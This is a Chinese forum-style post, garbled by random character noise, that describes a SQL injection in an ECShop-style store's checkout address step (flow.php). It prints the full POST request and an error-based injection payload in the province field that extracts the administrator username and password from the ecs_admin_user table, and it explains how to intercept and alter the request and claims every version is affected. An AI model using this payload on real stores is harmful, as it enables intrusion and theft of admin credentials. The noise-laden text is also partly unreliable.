感谢欠杀的黑盒
" Z& D! w j+ j5 ^+ f6 c
" q! q! h. E0 y V- |2 A 2 o* L% Z4 ^" B8 c
把任意商品加入购物车在填写配送地址那一页,有地区选择) m8 o/ K( v5 b+ z k" U0 C7 |
) [! {1 u1 x: z: rflow.php?step=consignee&direct_shopping=13 r; N' Q/ e4 Q. V5 O. d) W# `
比如省选择安徽$ H; h8 N. R& `7 p1 I
- B: I/ `$ `, r% X1 b
其中POST数据如下) U2 v. Y7 y( t' v; Z+ c w+ i v
" I E! \. D8 m' f2 O% n" Z! U
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
6 h1 m9 E& J! S' G( C( V# n改成
5 p+ @, K" l) Q+ E1 W1 f
`% B) J' y/ _8 [province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #3 l5 b# P0 p, h. i0 J, K" E
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..; z! u' @5 T' @- D- H6 I
: h' D" j2 f5 o# {9 _先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包9 E: w8 }" M$ t. S
2 @; l: `6 |( V9 C$ ^! j就会回显错误页面了。。。。! K+ Q. T, ^7 S+ |, u
" D! k; x3 j+ C5 T6 u/ j8 p8 w我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的0 i' D3 u @: N- d
|